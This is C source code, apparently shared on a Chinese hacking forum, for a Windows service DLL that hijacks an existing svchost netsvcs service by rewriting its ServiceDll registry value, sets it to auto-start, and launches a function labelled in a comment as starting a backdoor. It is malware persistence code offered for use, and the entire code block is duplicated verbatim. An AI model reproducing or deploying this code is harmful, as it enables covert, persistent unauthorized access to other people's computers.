//说明:大部门代码来自bingle的文章,感谢bingle,并加入装载自启动代码
//感谢使用,幻影光临白帽子实验室http://www.dream2fly.net/forum
//感谢使用,幻影光临白帽子实验室http://www.dream2fly.net/forum
Code Language : C
//Service HANDLE & STATUS used to get service state
SERVICE_STATUS_HANDLE hSrv;
DWORD dwCurrState;
//report service stat to the service control manager
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
//RealService just create a process dream2fly.net
int ControlService(DWORD dwCommand)
{
char cmd[MAX_PATH] = {0};
if (dwCommand == SERVICE_CONTROL_CONTINUE)
{
strcpy(cmd, "net start ");
}
else if(dwCommand == SERVICE_CONTROL_STOP)
{
strcpy(cmd, "net stop ");
}
strcat(cmd, stServiceCfg.szSvcName);
PROCESS_INFORMATION pi;
STARTUPINFO si;
memset(&si,0,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
if(!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
else OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);
return 0;
}
int ReplaceService()
{
int rc = 0;
HKEY hKey = 0;
try{
char buff[500];
//query svchost setting
char *ptr, *pSvchost = "SOFTWARE//Microsoft//Windows NT//CurrentVersion//Svchost";
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
throw "";
}
DWORD type, size = sizeof buff;
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
RegCloseKey(hKey);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegQueryValueEx(Svchost//netsvcs)";
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;
if(*ptr == 0)
{
OutputString("you specify service name not in Svchost//netsvcs, must be one of following:");
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
OutputString(" - %s", ptr);
throw "";
}
//config service
strncpy(buff, "SYSTEM//CurrentControlSet//Services//", sizeof buff);
strcat(buff, stServiceCfg.szSvcName);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
DWORD dwValue = 2;//auto start
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(start)";
////////////////////
char szDllPath[MAX_PATH] = {0};
if(!GetModuleFileName(HMODULE(hDll), szDllPath, sizeof szDllPath))
throw "GetModuleFileName() get dll path";
LogToFile(szDllPath, GetLastError());
strcat(buff, "//Parameters");
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";
OutputString("Config service %s ok.", stServiceCfg.szSvcName);
}
catch(char *str)
{
if(str && str[0])
{
rc = GetLastError();
OutputString("%s error %d", str, rc);
}
}
RegCloseKey(hKey);
//启动服务
ControlService(SERVICE_CONTROL_CONTINUE);
return 0;
}
int RecoverService()
{
int rc = 0;
HKEY hKey = 0;
try{
LogToFile("RecoverService");
char buff[500];
//config service
strncpy(buff, "SYSTEM//CurrentControlSet//Services//", sizeof buff);
strcat(buff, stServiceCfg.szSvcName);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
LogToFile("RegSetValueEx");
DWORD dwValue = 3;//manule start
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(start)";
////////////////////
char szDllPath[MAX_PATH] = {0};
strcpy(szDllPath, "%SystemRoot%//System32//qmgr.dll");
strcat(buff, "//Parameters");
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";
OutputString("RecoverService(%s) SUCCESS.", stServiceCfg.szSvcName);
}
catch(char *str)
{
if(str && str[0])
{
LogToFile(str);
rc = GetLastError();
OutputString("%s error %d", str, rc);
}
}
RegCloseKey(hKey);
//说明:大部门代码来自bingle的文章,感谢bingle,并加入装载自启动代码
//感谢使用,幻影光临白帽子实验室http://www.dream2fly.net/forum
ControlService(SERVICE_CONTROL_STOP);
return 0;
}
BOOL InstallService()
{
// Open a handle to the SC Manager database.
int rc = 0;
HKEY hKey, hkParam = 0;
SC_HANDLE hscm = NULL, schService = NULL;
try{
char buff[500];
//query svchost setting
char *ptr, *pSvchost = "SOFTWARE//Microsoft//Windows NT//CurrentVersion//Svchost";
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
throw "";
}
DWORD type, size = sizeof buff;
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
RegCloseKey(hKey);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegQueryValueEx(Svchost//netsvcs)";
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;
if(*ptr == 0)
{
OutputString("you specify service name not in Svchost//netsvcs, must be one of following:");
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
OutputString(" - %s", ptr);
throw "";
}
//create service
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hscm == NULL)
throw "OpenSCManager()";
char *bin = "%SystemRoot%//system32//svchost.exe -k netsvcs";
schService = CreateService(
hscm, // SCManager database
stServiceCfg.szSvcName, // name of service
stServiceCfg.szSvcName, // service name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_SHARE_PROCESS, // service type
SERVICE_AUTO_START, // start type
SERVICE_ERROR_NORMAL, // error control type
bin, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password
if (schService == NULL)
{
OutputString("CreateService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError());
throw "";
}
OutputString("CreateService(%s) SUCCESS. Config it path %s", stServiceCfg.szSvcName, bin);
CloseServiceHandle(schService);
CloseServiceHandle(hscm);
//config service
strncpy(buff, "SYSTEM//CurrentControlSet//Services//", sizeof buff);
strncat(buff, stServiceCfg.szSvcName, 100);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
rc = RegCreateKey(hKey, "Parameters", &hkParam);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegCreateKey(Parameters)";
if(!GetModuleFileName(HMODULE(hDll), buff, sizeof buff))
throw "GetModuleFileName() get dll path";
rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)buff, strlen(buff)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";
OutputString("Config service %s ok.", stServiceCfg.szSvcName);
}
catch(char *str)
{
if(str && str[0])
{
rc = GetLastError();
OutputString("%s error %d", str, rc);
}
}
RegCloseKey(hKey);
RegCloseKey(hkParam);
CloseServiceHandle(schService);
CloseServiceHandle(hscm);
//说明:大部门代码来自bingle的文章,感谢bingle,并加入装载自启动代码
//感谢使用,幻影光临白帽子实验室http://www.dream2fly.net/forum
//启动服务
ControlService(SERVICE_CONTROL_CONTINUE);
return rc;
}
int UninstallService()
{
int rc = 0;
SC_HANDLE schService;
SC_HANDLE hscm;
__try{
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hscm == NULL)
{
OutputString("OpenSCManager() error %d", rc = GetLastError() );
return rc;
}
schService = OpenService(hscm, stServiceCfg.szSvcName, DELETE);
if (schService == NULL)
{
OutputString("OpenService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError() );
return rc;
}
if (!DeleteService(schService) )
{
OutputString("OpenService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError() );
return rc;
}
OutputString("DeleteService(%s) SUCCESS.", stServiceCfg.szSvcName);
}
__except(1)
{
OutputString("Exception Catched 0x%X", GetExceptionCode());
}
CloseServiceHandle(schService);
CloseServiceHandle(hscm);
ControlService(SERVICE_CONTROL_STOP);
return rc;
}
void ServiceMain( int argc, wchar_t *argv[])
{
char svcname[256];
strncpy(svcname, (char*)argv[0], sizeof svcname); //it's should be unicode, but if it's ansi we do it well
wcstombs(svcname, argv[0], sizeof svcname);
OutputString("SvcHostDLL: ServiceMain(%d, %s) called", argc, svcname);
hSrv = RegisterServiceCtrlHandler( svcname, (LPHANDLER_FUNCTION)ServiceHandler );
if( hSrv == NULL )
{
OutputString("SvcHostDLL: RegisterServiceCtrlHandler %S failed", argv[0]);
return;
}
TellSCM( SERVICE_START_PENDING, 0, 1 );
TellSCM( SERVICE_RUNNING, 0, 0 );
StartShell();//启动后门dream2fly.net
OutputString("SvcHostDLL: ServiceMain done");
return;
}
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
{
SERVICE_STATUS srvStatus;
srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
srvStatus.dwCurrentState = dwCurrState = dwState;
srvStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
srvStatus.dwWin32ExitCode = dwExitCode;
srvStatus.dwServiceSpecificExitCode = 0;
srvStatus.dwCheckPoint = dwProgress;
srvStatus.dwWaitHint = 3000;
return SetServiceStatus( hSrv, &srvStatus );
}
void __stdcall ServiceHandler( DWORD dwCommand )
{
// not really necessary because the service stops quickly
switch( dwCommand )
{
case SERVICE_CONTROL_STOP:
TellSCM( SERVICE_STOP_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_STOP");
Sleep(10);
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
case SERVICE_CONTROL_PAUSE:
TellSCM( SERVICE_PAUSE_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_PAUSE");
TellSCM( SERVICE_PAUSED, 0, 0 );
break;
case SERVICE_CONTROL_CONTINUE:
TellSCM( SERVICE_CONTINUE_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_CONTINUE");
TellSCM( SERVICE_RUNNING, 0, 0 );
break;
case SERVICE_CONTROL_INTERROGATE:
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_INTERROGATE");
TellSCM( dwCurrState, 0, 0 );
break;
case SERVICE_CONTROL_SHUTDOWN:
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_SHUTDOWN");
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
}
}
SERVICE_STATUS_HANDLE hSrv;
DWORD dwCurrState;
//report service stat to the service control manager
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
//RealService just create a process dream2fly.net
int ControlService(DWORD dwCommand)
{
char cmd[MAX_PATH] = {0};
if (dwCommand == SERVICE_CONTROL_CONTINUE)
{
strcpy(cmd, "net start ");
}
else if(dwCommand == SERVICE_CONTROL_STOP)
{
strcpy(cmd, "net stop ");
}
strcat(cmd, stServiceCfg.szSvcName);
PROCESS_INFORMATION pi;
STARTUPINFO si;
memset(&si,0,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
if(!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
else OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);
return 0;
}
int ReplaceService()
{
int rc = 0;
HKEY hKey = 0;
try{
char buff[500];
//query svchost setting
char *ptr, *pSvchost = "SOFTWARE//Microsoft//Windows NT//CurrentVersion//Svchost";
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
throw "";
}
DWORD type, size = sizeof buff;
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
RegCloseKey(hKey);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegQueryValueEx(Svchost//netsvcs)";
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;
if(*ptr == 0)
{
OutputString("you specify service name not in Svchost//netsvcs, must be one of following:");
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
OutputString(" - %s", ptr);
throw "";
}
//config service
strncpy(buff, "SYSTEM//CurrentControlSet//Services//", sizeof buff);
strcat(buff, stServiceCfg.szSvcName);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
DWORD dwValue = 2;//auto start
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(start)";
////////////////////
char szDllPath[MAX_PATH] = {0};
if(!GetModuleFileName(HMODULE(hDll), szDllPath, sizeof szDllPath))
throw "GetModuleFileName() get dll path";
LogToFile(szDllPath, GetLastError());
strcat(buff, "//Parameters");
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";
OutputString("Config service %s ok.", stServiceCfg.szSvcName);
}
catch(char *str)
{
if(str && str[0])
{
rc = GetLastError();
OutputString("%s error %d", str, rc);
}
}
RegCloseKey(hKey);
//启动服务
ControlService(SERVICE_CONTROL_CONTINUE);
return 0;
}
int RecoverService()
{
int rc = 0;
HKEY hKey = 0;
try{
LogToFile("RecoverService");
char buff[500];
//config service
strncpy(buff, "SYSTEM//CurrentControlSet//Services//", sizeof buff);
strcat(buff, stServiceCfg.szSvcName);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
LogToFile("RegSetValueEx");
DWORD dwValue = 3;//manule start
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(start)";
////////////////////
char szDllPath[MAX_PATH] = {0};
strcpy(szDllPath, "%SystemRoot%//System32//qmgr.dll");
strcat(buff, "//Parameters");
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";
OutputString("RecoverService(%s) SUCCESS.", stServiceCfg.szSvcName);
}
catch(char *str)
{
if(str && str[0])
{
LogToFile(str);
rc = GetLastError();
OutputString("%s error %d", str, rc);
}
}
RegCloseKey(hKey);
//说明:大部门代码来自bingle的文章,感谢bingle,并加入装载自启动代码
//感谢使用,幻影光临白帽子实验室http://www.dream2fly.net/forum
ControlService(SERVICE_CONTROL_STOP);
return 0;
}
BOOL InstallService()
{
// Open a handle to the SC Manager database.
int rc = 0;
HKEY hKey, hkParam = 0;
SC_HANDLE hscm = NULL, schService = NULL;
try{
char buff[500];
//query svchost setting
char *ptr, *pSvchost = "SOFTWARE//Microsoft//Windows NT//CurrentVersion//Svchost";
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
throw "";
}
DWORD type, size = sizeof buff;
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
RegCloseKey(hKey);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegQueryValueEx(Svchost//netsvcs)";
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;
if(*ptr == 0)
{
OutputString("you specify service name not in Svchost//netsvcs, must be one of following:");
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
OutputString(" - %s", ptr);
throw "";
}
//create service
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hscm == NULL)
throw "OpenSCManager()";
char *bin = "%SystemRoot%//system32//svchost.exe -k netsvcs";
schService = CreateService(
hscm, // SCManager database
stServiceCfg.szSvcName, // name of service
stServiceCfg.szSvcName, // service name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_SHARE_PROCESS, // service type
SERVICE_AUTO_START, // start type
SERVICE_ERROR_NORMAL, // error control type
bin, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password
if (schService == NULL)
{
OutputString("CreateService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError());
throw "";
}
OutputString("CreateService(%s) SUCCESS. Config it path %s", stServiceCfg.szSvcName, bin);
CloseServiceHandle(schService);
CloseServiceHandle(hscm);
//config service
strncpy(buff, "SYSTEM//CurrentControlSet//Services//", sizeof buff);
strncat(buff, stServiceCfg.szSvcName, 100);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
rc = RegCreateKey(hKey, "Parameters", &hkParam);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegCreateKey(Parameters)";
if(!GetModuleFileName(HMODULE(hDll), buff, sizeof buff))
throw "GetModuleFileName() get dll path";
rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)buff, strlen(buff)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";
OutputString("Config service %s ok.", stServiceCfg.szSvcName);
}
catch(char *str)
{
if(str && str[0])
{
rc = GetLastError();
OutputString("%s error %d", str, rc);
}
}
RegCloseKey(hKey);
RegCloseKey(hkParam);
CloseServiceHandle(schService);
CloseServiceHandle(hscm);
//说明:大部门代码来自bingle的文章,感谢bingle,并加入装载自启动代码
//感谢使用,幻影光临白帽子实验室http://www.dream2fly.net/forum
//启动服务
ControlService(SERVICE_CONTROL_CONTINUE);
return rc;
}
int UninstallService()
{
int rc = 0;
SC_HANDLE schService;
SC_HANDLE hscm;
__try{
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hscm == NULL)
{
OutputString("OpenSCManager() error %d", rc = GetLastError() );
return rc;
}
schService = OpenService(hscm, stServiceCfg.szSvcName, DELETE);
if (schService == NULL)
{
OutputString("OpenService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError() );
return rc;
}
if (!DeleteService(schService) )
{
OutputString("OpenService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError() );
return rc;
}
OutputString("DeleteService(%s) SUCCESS.", stServiceCfg.szSvcName);
}
__except(1)
{
OutputString("Exception Catched 0x%X", GetExceptionCode());
}
CloseServiceHandle(schService);
CloseServiceHandle(hscm);
ControlService(SERVICE_CONTROL_STOP);
return rc;
}
void ServiceMain( int argc, wchar_t *argv[])
{
char svcname[256];
strncpy(svcname, (char*)argv[0], sizeof svcname); //it's should be unicode, but if it's ansi we do it well
wcstombs(svcname, argv[0], sizeof svcname);
OutputString("SvcHostDLL: ServiceMain(%d, %s) called", argc, svcname);
hSrv = RegisterServiceCtrlHandler( svcname, (LPHANDLER_FUNCTION)ServiceHandler );
if( hSrv == NULL )
{
OutputString("SvcHostDLL: RegisterServiceCtrlHandler %S failed", argv[0]);
return;
}
TellSCM( SERVICE_START_PENDING, 0, 1 );
TellSCM( SERVICE_RUNNING, 0, 0 );
StartShell();//启动后门dream2fly.net
OutputString("SvcHostDLL: ServiceMain done");
return;
}
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
{
SERVICE_STATUS srvStatus;
srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
srvStatus.dwCurrentState = dwCurrState = dwState;
srvStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
srvStatus.dwWin32ExitCode = dwExitCode;
srvStatus.dwServiceSpecificExitCode = 0;
srvStatus.dwCheckPoint = dwProgress;
srvStatus.dwWaitHint = 3000;
return SetServiceStatus( hSrv, &srvStatus );
}
void __stdcall ServiceHandler( DWORD dwCommand )
{
// not really necessary because the service stops quickly
switch( dwCommand )
{
case SERVICE_CONTROL_STOP:
TellSCM( SERVICE_STOP_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_STOP");
Sleep(10);
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
case SERVICE_CONTROL_PAUSE:
TellSCM( SERVICE_PAUSE_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_PAUSE");
TellSCM( SERVICE_PAUSED, 0, 0 );
break;
case SERVICE_CONTROL_CONTINUE:
TellSCM( SERVICE_CONTINUE_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_CONTINUE");
TellSCM( SERVICE_RUNNING, 0, 0 );
break;
case SERVICE_CONTROL_INTERROGATE:
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_INTERROGATE");
TellSCM( dwCurrState, 0, 0 );
break;
case SERVICE_CONTROL_SHUTDOWN:
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_SHUTDOWN");
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
}
}